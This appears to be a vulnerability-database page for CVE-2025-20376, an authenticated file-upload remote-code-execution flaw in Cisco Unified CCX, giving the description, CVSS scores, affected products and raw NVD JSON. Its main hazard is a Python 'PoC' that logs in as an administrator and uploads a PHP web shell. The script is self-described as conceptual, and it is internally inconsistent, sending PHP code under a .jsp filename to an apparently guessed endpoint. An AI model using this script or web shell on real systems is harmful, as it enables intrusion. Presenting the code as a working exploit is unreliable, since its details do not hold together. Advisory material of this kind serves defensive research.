Security Vulnerability Report
中文
CVE-2025-20376 CVSS 6.5 MEDIUM

CVE-2025-20376

Published: 2025-11-05 17:15:39
Last Modified: 2025-11-17 19:39:36
Source: [email protected]

Description

A vulnerability in the web UI of Cisco Unified CCX could allow an authenticated, remote attacker to upload and execute arbitrary files. This vulnerability is due to an insufficient input validation associated to file upload mechanisms. An attacker could exploit this vulnerability by uploading a malicious file to the web UI and executing it. A successful exploit could allow the attacker to execute arbitrary commands on the underlying system and elevate privileges to root. To exploit this vulnerability, the attacker must have valid administrative credentials.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:N

Configurations (Affected Products)

cpe:2.3:a:cisco:unified_contact_center_express:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:cisco:unified_contact_center_express:15.0:*:*:*:*:*:*:* - VULNERABLE
Cisco Unified CCX - 版本信息需参考官方安全公告

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3 """ CVE-2025-20376 PoC - Cisco Unified CCX File Upload RCE Note: This is a conceptual PoC for educational and security research purposes only. """ import requests import sys import base64 # Target configuration TARGET_IP = "<target_ip>" USERNAME = "<admin_username>" PASSWORD = "<admin_password>" TARGET_URL = f"https://{TARGET_IP}/ccx-admin" def create_malicious_file(): """Generate malicious file payload""" # Example webshell content (for demonstration) webshell = "<?php system($_GET['cmd']); ?>" return webshell def authenticate(): """Authenticate with Cisco Unified CCX admin interface""" session = requests.Session() login_url = f"{TARGET_URL}/j_spring_security_check" login_data = { 'j_username': USERNAME, 'j_password': PASSWORD } try: response = session.post(login_url, data=login_data, verify=False, timeout=30) if response.status_code == 200 and 'login' not in response.url.lower(): return session except requests.exceptions.RequestException as e: print(f"[-] Authentication failed: {e}") return None def upload_malicious_file(session): """Upload malicious file via vulnerable endpoint""" upload_url = f"{TARGET_URL}/fileupload" files = { 'file': ('exploit.jsp', create_malicious_file(), 'application/octet-stream') } try: response = session.post(upload_url, files=files, verify=False, timeout=30) if response.status_code == 200: print("[+] File uploaded successfully") return True except requests.exceptions.RequestException as e: print(f"[-] File upload failed: {e}") return False def main(): print("[*] CVE-2025-20376 - Cisco Unified CCX File Upload RCE") print("[*] Use only in authorized testing environments") session = authenticate() if session: print("[+] Authentication successful") if upload_malicious_file(session): print("[+] Exploitation successful - Check for RCE") else: print("[-] Failed to authenticate") if __name__ == "__main__": main()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-20376", "sourceIdentifier": "[email protected]", "published": "2025-11-05T17:15:38.953", "lastModified": "2025-11-17T19:39:35.820", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability in the web UI of Cisco Unified CCX could allow an authenticated, remote attacker to upload and execute arbitrary files.\r\n\r\nThis vulnerability is due to an insufficient input validation associated to file upload mechanisms. An attacker could exploit this vulnerability by uploading a malicious file to the web UI and executing it. A successful exploit could allow the attacker to execute arbitrary commands on the underlying system and elevate privileges to root. To exploit this vulnerability, the attacker must have valid administrative credentials."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.2, "impactScore": 5.2}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.2, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-434"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:cisco:unified_contact_center_express:*:*:*:*:*:*:*:*", "versionEndExcluding": "12.5\\(1\\)_su03_es07", "matchCriteriaId": "6EF18C21-6E70-4748-99FA-884754F44D1A"}, {"vulnerable": true, "criteria": "cpe:2.3:a:cisco:unified_contact_center_express:15.0:*:*:*:*:*:*:*", "matchCriteriaId": "124C88AE-ED0C-4CBC-A84D-200EDB776C8C"}]}]}], "references": [{"url": "https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-cc-mult-vuln-gK4TFXSn", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.